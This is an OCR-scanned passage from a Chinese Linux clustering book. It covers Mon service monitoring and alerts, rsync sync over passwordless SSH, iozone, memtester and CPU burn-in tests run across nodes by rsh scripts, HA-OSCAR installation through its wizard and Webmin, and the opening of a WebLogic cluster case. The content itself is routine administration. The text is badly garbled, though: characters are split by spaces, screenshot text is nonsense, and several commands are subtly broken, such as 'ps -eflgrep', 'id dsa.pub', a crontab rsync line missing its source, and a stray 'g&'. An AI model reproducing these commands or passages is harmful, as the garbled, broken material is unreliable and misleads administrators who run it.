同样 地 , 在 linux2 中 完成 以 上 步骤 。 但 注意 , 在 配置 /etc/mon/mon.cf 时 ，“hostgroup www 
10.1.1.1” 应 设置 为 “hostgroup www 10.1.1.2”。 
在 两 台 服务 器 上 分 别 安装 和 配置 完成 后 ， 启 动 Mon 服务 : 


#/usr/lib/mon/mon -c /etc/mon/mon.cf & 
查看 log 文件 ， 检 查 服务 状态 : 


#tail /var/log/messages 


Nov 2 17:15:20 linux mon[14079]: mon server started 
运行 “ps -eflgrep mon” 查 看 进程 ， 可 以 看 到 Mon 服务 成 功 启 动 。 


root 14079 1 0 17:15 ? 00:00:00 /usr/bin/perl/usr/lib/mon/mon 


-c/etc/mon/mon.cf 
(3) 对 Mon 服务 进行 测试 
Q@ 测试 Apache 服务 的 邮件 告警 和 服务 重启 功能 。 
先 关闭 linuxl 的 Apache 服务 : 


#/etc/init.d/apache2 stop 


查看 log 文件 ， 检 查 Mon 服务 的 处 理 步骤 。Mon 首先 发 现 WWW 服务 不 能 访问 ， 然 后 重 
启 Apache 服务 ， 并 且 发 送 Email 到 指定 的 邮箱 。 
log 文件 内 容 如 下 : 


Nov 2 17:15:59 linux mon[14079]: failure for www http 1099386959 10.1.1.1 

Nov 2 17:15:59 linux mon[14079]: calling alert apacherestart.alert for 
www/http(/usr/lib/mon/alert.d/apacherestart.alert,) 10.1.1.1 

Nov 2 L116503 linux mon[14079] : calling alert mail.alert for 
www/http(/usr/lib/mon/alert.d/mail.alert,song@heming.org) 10.1.1.1 


邮件 内 容 如 下 : 


ALERT www/http: 10.1.1.1(Tue Nov 2 17:16:03) (标题 ) 
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Sunmmary output 二 

Group : WwW 

Service st 

Time noticed : Tue Nov 2 17:16:03 2004 


Secs until next alert 
Members hh © 
Detailed text (if any) follows: 


HOST 10.1.1.1: connect: Connection refused 


@ 测试 网 络 监控 和 警告 。 
关闭 linuxl 的 网 络 服务 : 


#/etc/init.d/network stop 


Mon 会 发 送 告警 邮件 到 指定 邮箱 。 


5.2.6 ”数据 同步 

假设 这 里 只 更 新 linuxl 服务 器 上 的 数据 ， 由 linuxl 定时 向 linux2 复制 数据 ， 这 就 需要 进 
行 数据 同步 设置 。 

首先 ， 设 置 linuxl 到 linux2 的 SSH 无 密码 登录 : 


#ssh-keygen -t dsa 
#scp /root/.ssh/id dsa.pub 10.1.1.2:/root/.ssh/authorized keys 
#ssh 10.1.1.2 (应 该 不 用 输入 密码 就 能 登录 ) 


然后 ， 在 linuxl 上 运行 Rsync 进行 数据 同步 : 
#/usr/bin/rsync -avzoge ssh /srv/www/htdocs 10.1.1.2:/srv/www/htdocs 
这 时 会 显示 如 下 内 容 : 


building file list ** done 


将 数据 同步 服务 加 入 到 Crontab, 设置 30 分 钟 (时 间 可 以 根据 具体 需要 决定 ) 数据 同步 一 
次 。 命 令 如 下 : 


#crontab -e 


*/30 * * * * /usr/sbin/rsync -avzoge ssh 10.1.1.2:/srv/www/html 


至 此 ， 具 有 数据 同步 、 服 务 监控 的 高 可 用 性 服务 系统 搭建 完成 。 
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5.2.7 ”集群 测试 技术 


1. 集 群 的 IO 性 能 测试 

我 们 利用 iozone 的 性 能 测试 工具 来 测试 集群 性 能 。 测 试 步骤 如 下 。 
在 Server 节点 上 安装 iozone (可 以 到 www.iozone.org 上 下 载 ) : 
#rpm -ivh iozone-3-326.i386.rpm 

贺 将 Server 节点 的 iozone 复制 到 所 有 节点 的 /tmp 下 : 


#cp /opt/iozone/bin/iozone /tmp 
#rcp /opt/iozone/bin/iozone nodel: /tmp (在 每 个 节点 这 么 操作 ， 或 编写 shell 脚本 ) 


加 在 两 节点 上 操作 : 


#cp /opt/iozone/bin/iozone /root 


加 编辑 /root/nodelist， 格 式 为 : 


nodel /test/fs /tmp/iozone 
node2 /test/fs /tmp/iozone 


加 将 节点 上 的 文件 系统 导出 ， 使 其 他 节点 挂 接 : 


#vi /etc/exports 加 入 如 下 行内 容 
/test *(rw) 
#exportfs -a 


四 在 所 有 节点 上 挂 接 /testfs: 


#mkdir /testfs 
#mount server:/testfs /testfs 


在 节点 上 执行 : 

#/root/iozone -i 0 -i 1 -r 4096 -s 4g -Recblog.xls -t 2 -+m nodelist -C | tee 
iozone.1og 

程序 在 测试 时 会 在 /testfs 里 产生 各 个 节点 的 数据 包 ， 测 试 完成 后 在 iozone.log 里 看 到 各 节 
点 的 读 写 及 最 大 速度 、 最 小 速度 、 平 均 速度 、 总 的 吞吐 量 等 参数 。 

通常 情况 下 ， 测 试 的 文件 大 小 要 求 至 少 是 系统 Cache 的 两 倍 以 上 ， 这 样 ， 测试 的 结果 才 
是 真实 可 信 的 。 如 果 小 于 Cache 的 两 倍 , 文件 的 读 写 测试 读 写 的 将 是 Cache 的 速度 , 测试 的 结 
果 会 大 打折 扣 。 


2. 测 试 集群 的 可 靠 性 


在 完成 上 述 集群 的 IO 性 能 测试 后 ， 集 群 的 可 靠 性 同样 是 不 可 忽视 的 。 集 群 的 可 靠 性 依赖 
于 集群 现 有 的 硬件 。 通过 测试 , 可 以 降低 集群 系统 运行 过 程 中 出 现 意外 的 几率 ， 进 而 保证 系统 
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的 正常 运转 。 在 集群 的 可 靠 性 测试 中 , 应 该 重点 测试 内 存 和 CPU。 下 面 就 讲述 一 下 内 存 和 CPU 
的 可 靠 性 测试 方法 。 
(1) 内 存 测 试 

内 存 测试 的 工具 有 很 多 , 现在 使 用 比较 多 的 是 Memtester。 可 以 到 http://www.qcc.ca/charlesc/ 
software/memtester/ 下 载 Memtester 的 最 新 版 本 。Memtester 主要 是 捕获 内 存 错误 和 一 直 处 于 很 
高 或 很 低 的 坏 位 , 其 测试 的 主要 项 目 包 括 随 机 值 、 异 或 比较 、 减法、 乘法 、 除 法 和 与 或 运算 等 。 
通过 给 定 测试 内 存 的 大 小 和 次 数 ， 可 以 对 系统 现 有 的 内 存 进行 上 述 项 目的 测试 。 

具体 的 测试 步骤 如 下 : 

下 载 Memtester 的 安装 包 memtester-4.0.4.tar。 

加 解 开 tar 包 : 


#tar -xvf memtester-4.0.4.tar -C /tmp 
贺 编译 Memtester 源码 : 


#cd memtester-4.0.4 
#make all 


这 样 ， 在 当前 目录 下 会 生成 Memtester 的 可 执行 文件 。 
Memtester 的 参数 有 两 个 : 


#./memtester ram-size [runs] 
“ram-size” 指 定 要 测试 内 存 的 大 小 ， 单 位 是 MB; “runs” 是 要 测试 的 次 数 。 
在 集群 的 部 署 及 测试。 


同步 进行 测试 ， 可 以 达到 事半功倍 的 效果 。 
@ 分 发 Memtester 到 所 有 节点 : 
#cp /tmp/memtester-4.0.4/memtester/tmp 


使 用 下 面 的 脚本 fengfa.sh 将 Memtester 分 发 到 所 有 的 节点 。 假 设 现在 有 2 个 节点 ，IP 地 
址 的 范围 是 192.168.8.92~192.168.8.93。 


#!/bin/sh 

for( (i=2;i<=3;i++)) 

do 

rcp /tmp/memtest 192.168.8.$i: /tmp/ 
done 


这 样 在 所 有 节点 的 /tmp 目录 下 都 会 有 Memtester 文件 。 
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@ 并 发 测试 

使 用 test.sh 脚本 并 发 地 测试 系统 内 存 : 

#!/bin/sh 

# 其 中 $1 代表 测试 内 存 的 大 小 ， 单 位 是 MB 

for ( (i=1;i<=3;i++)) 

do 

rsh 192.168.8.$i "/tmp/memtester $1 > /tmp/memtest.1og"& 
done 


如 果 没 有 指定 测试 次 数 ， 那 么 测试 会 一 直 进 行 ， 直 到 用 户 终 止 它 。 测 试 完成 后 在 /tmp 下 

会 产生 memtestlog 文件 。 可 以 查看 该 文件 对 系统 内 存 的 测试 结果 并 进行 分 析 。 
(2) CPU 测试 

常见 的 CPU 测试 工具 有 SETI@home、CPU Bum 和 CPU Burn-in。 它们 的 测试 原理 大 致 都 
是 在 提高 CPU 温度 和 主 频 的 情况 下 进行 测试 ， 其 中 以 CPU Bum-in 的 测试 最 为 简单 。 

具体 的 测试 步骤 如 下 : 

加 在 http://users.bigpond.net.au/cpuburn/ 下 载 cpuburn-in_tar。 

四 解 开 tar 包 : 


#tar -xvf cpuburn-in.tar -C /tmp 

贺 CPU Bum-in 的 测试 很 简单 ， 只 要 给 出 测试 时 间 ， 系 统 就 会 一 直 测试 : 
#cpuburn-in times 

其 中 ，times 表示 测试 的 时 间 ， 以 分 钟 计 。 

四 在 集群 的 部 署 及 测试 。 

@ 使 用 脚本 cpu.sh 分 发 CPU Burn-in 到 所 有 的 节点 。 


#!/bin/sh 

for ( (i=2;i<=3;i++)) 

do 

rcp /tmp/cpuburn-in 192.168.8.$i:/tmp/ 
done 


@ 使 用 脚本 cputest.sh 测试 所 有 节点 的 CPU。 


#!/bin/sh 

# 其 中 $1 代表 测试 时 间 的 长 短 ， 单 位 是 分 钟 

for( (i=1;i<=3;i++)) 

do 

rsh 192.168.8.$i "/tmp/cpuburn-in $1 >/tmp/cpulog"g& 
done 
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测试 完成 后 ， 系 统 产 生 /tmp/cpulog 日 志文 件 。 可 以 使 用 下 面 的 脚本 view.sh 查看 CPU 是 
否 出 错 。 

#!/bin/sh 

for( (i=1;i<=100;i++)) 

do 

rsh 192.168.8.$i hostname 


rsh 192.168.8.$i "grep -i fail /tmp/cpulog" 
done 


5.3 利用 HA-OSCAR 创建 高 可 用 Linux 集群 


Linux 下 的 集群 系统 通常 分 为 HA 容错 集群 、 负 载 均衡 集群 (LBC) 和 HPC 高 性 能 计算 
机 集群 ， 随 着 核心 业务 要 求 的 不 断 提 高 ， 企 业 在 HA 上 的 需求 也 越 来 越 多 ， 本 节 重 点 介绍 
OSCAR 的 HA 集群 实现 。 

HA-OSCAR 项 目的 主要 目标 是 对 现 有 的 OSCAR、Beowulf 体系 结构 和 集群 管理 技术 
系统 (包含 OSCAR: http://oscar.openclustergroup.org/, ROCKS: http://www.rocksclusters.org/ 
和 Scyld: http://www.scyld.com/) 进行 改进 ， 并 且 为 Linux 集群 提供 高 可 用 性 和 高 度 灵活 
的 解决 方案 。 和 OSCAR 相 比 ，HA-OSCAR 添加 了 一 些 新 的 功能 ， 主 要 是 集中 在 可 用 性 、 
可 扩展 性 和 安全 性 领域 。 在 其 发 行 的 最 初版 本 中 包含 的 新 功能 就 有 针对 硬件 、 服 务 和 应 用 
程序 的 主 节点 元 余 和 自我 修复 能 力 。 

这 里 我 们 为 系统 管理 员 提供 了 一 个 系统 化 的 安装 指导 , 以 及 在 安装 过 程 中 可 能 会 出 现 的 问 
题 的 一 些 解释 , 我 们 假设 读者 已 经 熟悉 了 基本 的 系统 管理 命令 。 如 果 你 有 OSCAR 方面 的 安装 
经 验 和 系统 管理 的 经 验 ， 将 会 非常 有 助 于 阅读 本 节 内 容 。 


5.3.1 支持 的 发 行 版 和 系统 要 求 


HA-OSCAR 小 组 已 经 针对 Red Hat 9.0 平台 对 OSCAR 2.3、2.3.1 和 3.0 进行 了 测试 。 要 创 
建 的 集群 的 硬件 环境 如 下 所 示 。 


®@ 主 节点 : 两 台 双 Xeon 2.4GHz 的 机 器 ， 每 台 机 器 安装 有 1GB 的 内 存 、 一 个 40GB 的 硬 
盘 和 两 个 网 卡 。 

@ 客户 端 节点 : 四 台 双 Xeon 2.4GHz 的 机 器 ， 每 台 机 器 安装 有 1GB 的 内 存 、 一 个 40GB 
的 硬盘 和 两 块 网 卡 。 

@ 交换 机 : 使 用 的 是 D-Link 10Mbps / 100Mbps 的 交换 机 。 


注意 : 在 创建 集群 时 ， 应 该 使 用 相同 的 硬件 ， 并 且 每 个 服务 器 都 应 该 至 少 有 两 个 网 卡 。 网 


卡 必须 能 够 支持 PXE 启动 ， 并 且 它 们 必须 都 连接 到 本 地 交换 机 上 《需要 两 块 网 卡 是 为 了 实现 
元 余 ) 。 
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5.3.2 ”HA-OSCAR 的 体系 结构 


HA-OSCAR 由 以 下 主要 的 系统 组 件 组 成 : 


@ 一 个 主要 的 服务 器 。 该 服务 器 的 功能 是 接收 和 发 送 特定 客户 机 的 请 求 。 每 一 个 服务 器 
都 有 三 块 网 卡 : 其 中 一 块 网 卡通 过 一 个 公共 网 络 地 址 连接 到 Internet, 另外 两 块 则 用 于 
连接 到 私有 局 域 网 ， 该 私有 网 络 由 一 个 以 太 网 和 一 个 备用 局 域 网 组 成 。 

@ 一 个 备用 服务 器 。 该 服务 器 会 对 主 服务 器 进行 监视 ， 一 旦 主 服务 器 出 现 故障 ， 就 会 立 
即 接管 其 工作 。 

@ 多 个 客户 机 ， 用 于 完成 计算 任务 。 

@ 本 地 局 域 网 交换 机 , 用 于 实现 本 地 节点 的 连接 。 每 一 个 主 节点 必须 要 有 至 少 两 块 网 卡 : 
eth0 和 eth1。 其 中 一 块 网 卡 是 针对 外 部 网 络 的 公共 接口 ， 另 外 一 块 则 是 针对 内 部 局 域 
网 中 计算 节点 的 私有 接口 。 具 体 的 配置 取决 于 用 户 如 何 将 eth0、ethl 和 公共 或 者 私有 
网 络 进行 连接 。 我 们 在 这 里 假设 eth0 是 私有 接口 ， 而 ethl 是 公共 接口 。 图 5.5 描述 了 
HA-OSCAR 的 体系 结构 。 图 5.6 显示 了 一 个 HA-OSCAR 主 节 点 的 网 络 结构 范例 。 


图 5.5 HA-OSCAR 体系 结构 
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occurs, eth1:1 wil 
be configured io 
‘he same IP 

13847.51.120 as 


etht DHCP 
eth1:1 (virtual) 138.47.51.120 
Primary Head [三 
noge 


Ether0p:10.0.0.1 th0 
Ether0:1:10.0.0， :1:10.0.0 


图 5.6 主 节点 网 络 配 置 


如 果 你 的 机 器 上 已 经 安装 有 OSCAR， 则 可 以 下 载 HA-OSCAR (http://xcr.cenit.latech.edu/ 
ha-oscar) ， 然 后 以 root 身份 来 进行 安装 。 把 软件 包 解压 缩 后 ， 使 用 以 下 命令 来 安装 HA-OSCAR: 


./haoscar install<interface> 


这 里 的 interface 是 指 主 节点 的 私有 网 卡 ， 通 常 是 eth0。 
输入 命令 后 ， 就 会 弹出 如 图 5.7 所 示 的 HA-OSCAR 安装 向 导 。 


[HAoscCAR msalauon Wieard on etho = 


HA-OSCAR Installation Wisard 
Betore make sure you have instaled OSCAR, | 
Works 


yee poe ey 
所 Step 1: HA-OSCAR Packages Installation,.. 
4 Step 2: Building Image for Standby server [Be patient!] 
hh next step, make sure you oniy deal with OSCAR server nodest 
区 Step 3: Configuration for Standby server on [ethoj 


WATTENTION: 
In the next step, please make sure yo eum 
MA sie tor AOSEAR Ney Server 


加 Step 4: Network Setup & Make boot server on [ethO]... 


Now. switch to Standyy server and do logout and login operation. 


yo wnt to ertad WN ODAR Pocage, 
| S| 


图 5.7 HA-OSCAR 安装 向 导 
这 个 安装 向 导 可 以 通过 以 下 步骤 引导 用 户 完 成 整个 安装 过 程 : 


安装 HA-OSCAR 软件 包 。 
四 创建 一 个 各 用 服务 器 映像 (克隆 主 服务 器 ) 。 
加 配置 备用 服务 器 。 
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在 备用 服务 器 上 设置 网 络 和 创建 启动 映像 。 

加 完成 安装 过 程 。 

安装 向 导 中 的 每 个 步骤 所 作 的 事情 也 写 得 很 明白 。 第 一 次 安装 时 , 这 5 个 步骤 顺序 不 能 
错 ， 而 且 中 间 不 能 少 做 某 个 步骤 。 每 个 步骤 都 有 帮助 文件 可 供 参 考 , 建议 初次 安装 的 读者 先 看 
帮助 ， 对 理解 OSCAR 的 安装 过 程 会 有 帮助 。 初 学 者 一 定 要 按照 上 述 顺序 一 步 一 步 做 ， 和 否则 可 
能 会 出 现 预想 不 到 的 后 果 。 


5.3.3 ”HA-OSCAR 的 向 导 安 装 步骤 详解 


(1) HA-OSCAR 软件 包 的 安装 
在 这 一 步 中 , 这 个 向 导 将 安装 所 有 需要 的 软件 包 至 OSCAR 集群 服务 器 中 。 第 一 步 大 约 只 
需要 1 分 钟 的 时 间 即 可 完成 。 


(2) 创建 一 个 备用 服务 器 映像 (克隆 主 服务 器 ) 

第 二 步 的 目的 是 从 主 节 点 创建 一 个 备用 服务 器 映像 。 当 单 击 “Building Image for Standby 
server” 时 ， 向 导 会 弹出 另外 一 个 窗口 并 要 求 用 户 输入 一 个 服务 器 映像 名 。 一 般 来 说 ， 我 们 可 
以 使 用 默认 值 并 且 直 接 单 击 “Fetch Image” 按 钮 (如 图 5.8 所 示 ) 来 为 备用 服务 器 获取 一 个 映 
像 。 这 个 步骤 需要 花费 一 些 时 间 。 


图 5.8 获取 一 个 服务 器 映像 


从 一 个 主 服务 器 克隆 一 个 备份 服务 器 是 一 个 非常 重要 的 步 又， 考虑 到 检修 等 方面 的 需求 ， 
推荐 使 用 一 个 独立 的 映像 服务 器 用 于 映像 存储 和 恢复 。 

这 个 步骤 需要 15 分 钟 的 时 间 ， 成 功 完成 后 ， 会 弹出 一 个 完成 的 状态 窗口 ， 单 击 窗口 中 的 
“Close” 按 钮 。 


(3) 配置 备用 服务 器 
这 一 步骤 需要 用 户 输入 一 个 别名 的 公共 他 地 址 (alias public IP) 。HA-OSCAR 将 弹出 如 
5.9 所 示 的 备用 服务 器 初始 网 络 配置 界面 。 
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Add Standby seryer to a Server Image 回 口 口 | 


bea ns | [re] 

Primary servers Public Network Interface: lm ep | 
Standby servers Public Network Interface: mm hep | 
Standby servers Public Alias IP: haoarztrss hep | 
Standby servers local IP: hszresiznmm hep | 
Subnet Mask: sszsszsso hep | 
Default Gateway: [szreat new | 
Primary public IP: asoezz newp | 
er Err 
Default Gateway public IP: 138.47.102.1 _Help | 
Addstandby Server | 


图 5.9 Standby Server 初始 网 络 配置 


用 户 通常 使 用 这 个 公共 IP 地 址 作为 访问 主 节点 的 虚拟 入 口 。 当 出 现 故 障 时 ， 备 用 服务 器 
可 以 马上 接管 这 个 地 址 ， 而 用 户 则 可 以 继续 正常 访问 这 个 群集 。 这 个 步骤 的 正常 程序 如 下 : 


将 别名 公共 他 分 配给 ethl 网 卡 。 当 出 现 故障 时 ， 备 用 服务 器 将 自动 克隆 集群 公共 人 P 
到 指定 的 网 卡 ， 通 常 是 ethl。 

贺 检查 备用 本 地 也 地址 的 HA-OSCAR 是 否 已 经 被 使 用 ， 如 果 卫 地 址 被 使 用 ， 则 选择 
一 个 新 的 IP 地址 ， 否 则 保留 这 个 IP。 

园 不 要 更 改 最 后 两 项 。 

加 单 击 “Add Standby Server” 按 钮 。 


这 个 步骤 只 需要 不 到 1 分 钟 的 时 间 ， 当 成 功 完成 的 状态 窗口 弹出 时 ， 单 击 “Close” 按 钮 

接 下 来 ， 我 们 要 获取 备用 服务 器 的 MAC 地 址 〈 用 于 PXE Boot) ， 并 且 在 本 地 硬盘 上 创 
建 映像 。 在 本 地 硬盘 上 创建 映像 之 前 ， 请 注意 按照 程序 获取 备用 服务 器 的 MAC 地 址 ， 用 于 
PXE 启动 。 其 中 的 一 个 备用 服务 器 网 卡 〈 一 般 是 eth0) 连接 到 私有 局 域 网 ， 并 且 在 网 络 启动 
过 程 中 广播 它 的 MAC 地 址 。 

一 旦 主 服务 器 准备 好 创建 备用 服务 器 映像 ， 它 就 会 使 用 收集 到 的 地 址 来 开始 映像 。 因 此 ， 
备用 服务 器 会 通过 PXE 网 络 启动 后 从 主 服务 器 或 者 一 个 可 选 的 使 用 本 地 文件 系统 的 映像 服务 
器 上 获取 映像 。 克 隆 成 功 后 ， 服 务 器 将 从 它 的 硬盘 上 重新 启动 。 


(4) 网 络 设置 和 使 服务 器 可 启动 
分 配 完备 用 服务 器 的 MAC 地 址 和 在 备用 服务 器 上 创建 本 地 映像 后 ， 就 可 以 进行 第 4 步 。 
HA-OSCAR 显示 的 备用 服务 器 MAC 地 址 配置 界面 如 图 5.10 所 示 。 


wpe 
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YStandby Sever MAC Address Colkctpn PT 


图 5.10 备用 服务 器 MAC 地 址 配置 
这 个 步骤 包含 以 下 的 程序 : 


单 击 “Setup Network Boot” 按 钮 。 

单 击 “Start Collecting Mac” 地 址 按钮 , 命令 主 服务 器 来 收集 备用 服务 器 的 MAC 地 址 。 

切换 到 备用 服务 器 终端 , 将 其 启动 顺序 配置 为 从 网 络 启动 ,然后 重新 启动 备用 服务 器 
系统 。 确保 备用 服务 器 的 eth0 已 经 连接 到 了 本 地 交换 机 上 , 在 这 个 交换 机 上 , 主 服务 器 的 PXE 
监控 程序 可 以 监听 广播 启动 请 求 否则, 主 服务 器 将 无 法 在 下 一 个 步骤 中 收集 备用 MAC 地址 。 

加 回 到 主 服务 器 的 屏幕 ， 现 在 它 应 该 显示 备用 服务 器 的 MAC 地址 (如 图 5.11 所 示 ) 。 


Y_Sbndhy Server MAC Address Coliection PE 
Note: Disable Mias IP of NIC first. 

Tool. When a MAC 
natwork. it wii appear in the left column. To assign that MAC address to a machne 
hghight the and the machine and Cick ‘Assign 


oscardoman 
mac - 00:00.81:2:1c:7a 
p=100.02 


(Below are commands to create a boot enviromment. 
You can either boot from foppy or network 


L Build Putoinstal Roppy... Setup Network Boot | 画 | 
图 5.11 完成 MAC 地 址 收集 后 的 备用 服务 器 MAC 地 址 配置 
加 将 MAC 地 址 分 配给 备用 服务 器 的 网 卡 (如 eth0) 。 
四 单 击 “Configure DHCP Server” 按 钮 。 
回 到 备用 服务 器 的 终端 并 且 重 启 备用 服务 器 , 现在 就 已 经 准备 好 了 在 备用 服务 器 上 
创建 一 个 本 地 映像 。 这 个 步骤 需要 30 分 钟 到 一 个 小 时 ， 所 以 需要 耐心 等 待 。 
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国 当 备 用 服务 器 映像 创建 完成 后 , 请 确保 将 其 服务 器 启动 设备 设 为 本 地 硬盘 ,然后 重新 
启动 系统 。 
(5) 完成 HA-OSCAR 的 安装 
完成 上 述 4 个 步骤 后 , 集群 上 所 有 需要 的 软件 包 就 都 已 经 安装 完成 了 。 现在 这 个 集群 就 可 
以 进行 测试 和 使 用 了 。HA-OSCAR 同时 也 提供 了 基于 Web 的 管理 工具 来 对 HA-OSCAR 进行 
定制 和 配置 ， 这 其 中 包括 监控 模块 和 故障 的 能 力 。 然 而 ， 这 只 是 针对 高 级 用 户 的 功能 ， 因 为 如 
果 配 置 了 错误 的 HA-OSCAR 参数 ， 就 可 能 导致 无 效 的 集群 设置 。 


5.3.4 监控 和 配置 Webmin 


HA-OSCAR 在 默认 情况 下 提供 了 自我 健康 状况 监控 和 自我 修复 的 机 制 ， 同 时 也 提供 了 一 个 基 
于 Web 的 监控 和 配置 程序 (基于 WebMin : http:/www.webmincom/ 和 Mon : 
http://www.kemel.org/software/mon/) 。 用 户 可 以 使 用 HA-OSCAR Webmin 来 定制 资源 管理 、 配 置 和 
服务 监控 。 

下 面 就 来 看 一 看 如 何 一 步 一 步 地 手工 配置 虚拟 网 卡 、 检 测 信道 和 可 选 的 服务 监控 配置 。 需 要 再 
次 强调 的 是 ， 以 下 的 配置 程序 和 功能 只 是 针对 高 级 用 户 的 。 正 常 的 初始 主 节 点 配置 步骤 如 下 : 


加 在 主 服务 器 上 进行 信道 检测 和 配置 。 
贺 在 各 用 服务 器 上 进行 信道 检测 和 配置 。 
加 启动 可 选 的 HA-OSCAR 服务 监控 (只 针对 高 级 用 户 ) 。 


1. 主 服务 器 的 配置 


通过 地 址 http://localhost:10000 来 访问 HA-OSCAR Webmin, 然后 选择 HA-OSCAR 来 配置 
系统 ， 如 图 5.12 所 示 。 


HA-OSCAR 


图 5.12 配置 虚拟 网 卡 检测 信道 的 步骤 


032 
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手动 配置 (如 图 5.13 所 示 ) 包含 了 以 下 的 步骤: 


添加 虚拟 网 卡 到 eth0 和 eth1。 
四 定义 信道 检测 : 一 个 公共 网 及 它 的 虚拟 网 卡 (虚拟 公共 全 ， 这 个 IP 对 于 主 服务 器 和 
备用 服务 器 都 是 相同 的 ) 和 一 个 私有 网 络 及 它 的 虚拟 网 卡 (用 于 下 克隆 和 信道 检 测 )。 


其 他 的 用 户 也 可 以 通过 基于 Web 的 工具 来 登录 和 管理 自己 的 系统 。 


图 5.13 ”Webmin 的 主 界面 


2. 为 主 服 务 器 创建 虚拟 网 卡 


首先 在 如 图 5.14 所 示 的 界面 中 选择 “Detection channel configuration”， 这 时 就 会 出 现 如 
5.15 所 示 的 屏幕 。 刚 开始 时 , 应 该 有 三 个 网 卡 : eth0、ethl 和 1lo。 所 有 这 些 网 卡 都 是 在 OSCAR 
和 HA-OSCAR 的 安装 过 程 中 创建 的 。 单 击 图 5.16 所 示 的 “Add a new interface” 按 钮 来 为 eth0 
和 ethl 添加 虚拟 网 卡 。 图 5.17 和 图 5.18 显示 了 如 何 为 eth0 和 ethl 添加 虚拟 网 卡 。 


_ py Campmsm | Chek oi baton bo sve oorfigorton 


5.15 ”检测 信道 的 配置 
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图 5.16 网 卡 配置 界面 
时 le) | ED 


图 5.17 ethl 虚拟 网 卡 的 创建 


em ctpoamm | Ch em wamwenanienam 


图 5.18 ”信道 配置 选择 


3. 创建 检测 信道 

创建 完 虚拟 网 卡 后 ， 接 下 来 就 是 为 HA-OSCAR 检测 信道 来 定义 创建 好 的 网 卡 。 从 
HA-OSCAR Webmin 中 访问 检测 信道 的 配置 如 图 5.19 所 示 。 进 行 选择 以 后 ， 进 入 到 如 图 5.20 
所 示 的 网 卡 信息 界面 。 


图 5.19 主 服务 器 信道 配置 界面 
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图 5.20 网 络 和 监控 服务 配置 界面 


完成 信道 设置 和 主 服务 器 配置 后 , 单 击 图 5.19 所 示 的 “Save ”按钮 和 图 5.18 所 示 的 “Apply 
Configuration ”按钮 。 


4. 管理 服务 配置 的 可 选 步 噬 


HA-OSCAR 提供 了 非常 有 用 的 默认 监控 配置 策略 ， 不 过 用 户 也 可 以 自己 添加 新 的 服务 和 
更 改 监控 参数 。 对 于 高 级 用 户 而 言 ， 这 是 一 个 非常 值得 推荐 的 功能 。 在 下 一 个 界面 中 ,我们 可 
以 将 所 有 的 配置 都 应 用 到 HA-OSCAR。 


5. 备用 服务 器 的 配置 


完成 主 服务 器 的 配置 后 ， 切 换 到 备用 服务 器 终端 ， 并 且 通 过 http://localhost:1000 来 访问 
HA-OSCAR Webmin。 配 置 的 步骤 和 主 服务 器 的 配置 类 似 。 当 配置 完 网 卡 后 ， 选 择 只 在 备用 
服务 器 上 进行 信道 配置 ， 否 则 会 出 现 不 可 预见 的 结果 和 无 效 的 配置 。 不 同 的 配置 选项 分 别 如 
5.21、 图 5.22 和 图 5.23 所 示 。 


图 5.22 监控 服务 列表 
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AddEdiNstwark Interfaces For ChannsLConligurauon on ChanncLConfigurmaton on 
ee 


5.23 “ProcessServer” 监 控 策 略 的 配置 细节 
6. 在 备用 服务 器 上 创建 虚拟 网 卡 


可 以 在 备用 服务 器 上 创建 和 主 服务 器 配置 类 似 的 虚拟 网 卡 配 置 ， 创 建 界面 如 图 5.24 所 
示 。 图 5.25 显示 了 如 何 配置 备用 服务 器 的 虚拟 网 卡 。 


Interfaces Active Now 


For HA-OSCAR, user need to create Virtual network interface for both Private and Public Network 
Interface. Please use ^add a new interface’ function to create or edit Virtual network interface. 


Interfaces Activated at Boot Time [***Public Virtual IP of Standby Server should not 
activate at Boot Time!] 


5.24 备用 服务 器 的 网 卡 界面 


For HA OSCAR., urer need to create Virtual nctwork interfoce for both Private and Public Network 
nterface. Pleaoe une Sadd a new interface function to create or edit Virtual netw erk interface. 


Interfaces Activated at Boot Time |***Public Virtual IP of Standby Server should not 
activate at Boot Time!] 


Add anex nterface 


Ne ee ek ee 
图 5.25 在 备用 服务 器 上 创建 一 个 新 的 网 卡 
注意 : 不 要 在 启动 时 激活 虚拟 公共 瑟 ， 它 只 应 该 在 出 现 故 障 时 被 激活 。 图 5.26 显示 在 备 


用 服务 器 上 配置 检测 信道 ， 图 5.27 显示 对 检测 信道 的 详细 配置 。 完 成 网 卡 和 检测 信道 的 配置 
后 ， 返 回 初始 界面 并 进行 应 用 配置 (如 图 5.28 所 示 ) 。 


Ag 
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图 5.26 在 备用 服务 器 上 配置 检测 信道 
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5.28 ”应 用 配置 界面 
5.3.5 小 结 


如 果 成 功 运行 到 此 , 说 明 你 的 OSCAR 集群 已 经 安装 完毕 并 测试 通过 了 。 安装 集群 的 难度 
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的 确 不 是 一 般 软 件 所 能 比 的 ， 没 有 安装 成 功 的 读者 也 不 要 灰心 ， 耐 心 检查 日 志文 件 
oscarinstall.log。 本 节 的 目的 是 帮助 用 户 使 用 HA-OSCAR 自己 安装 和 配置 一 个 具有 高 可 用 性 的 
Linux 集群 。 通 过 这 些 步骤， 用 户 会 发 现 ， 其 实 配置 一 个 集群 也 不 是 一 件 高 不 可 攀 的 目标 。 


5.4 WebLogic 集群 高 可 用 案例 


2010 年 8 月 ， 北 京 一 家 大 型 证 券 交易 系统 由 于 基金 业务 火爆 ， 致 使 系统 压力 太 大 ， 后 台 
服务 器 频繁 死机 , 这 时 工程 师 们 紧急 调试 系统 及 恢复 操作 , 前 端的 所 有 任务 都 不 得 不 停 下 来 以 
等 待 系统 恢复 ， 最 终 造 成 证 券 交 易 系统 一 整 天 不 能 服务 的 重大 事故 ， 造 成 客户 不 能 买卖 基金 。 
从 以 上 情形 可 以 看 出 , 提高 证 券 交易 系统 的 高 可 用 性 是 多 么 重要 , 这 将 直接 关系 到 证 券 投资 业 
务 的 正常 开展 。 

本 节 主 要 介绍 如 何 配 置 WebLogic 集群 ， 如 图 5.29 所 示 。 


史前 共享 存储 


Oracle 
RAC 
Nodel Node2 


WebLogic 管 理 节点 WebLogic 受 管 节点 
192. 168. 0. 4 192. 168. 0.5 


图 5.29 WebLogic 集群 
硬件 : IBM 3950M2 + DS4700 (服务 器 和 存储 都 采用 SAS 盘 ); 
HBA 卡 : QLogic 4GB FC Single-Port PCIe HBA; 
集群 域名 字 : ptbosscluster; 
集群 组 播 地 址 : 239.192.0.0， 端 口 : 7777; 
Weblogic 服务 器 管理 用 户 名 和 密码 : weblogic/welcomel。 


对 服务 器 相关 信息 的 具体 说 明 如 表 5.1 所 示 。 
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表 5.1 服务 器 相关 信息 
IE 


192.168.0.4 


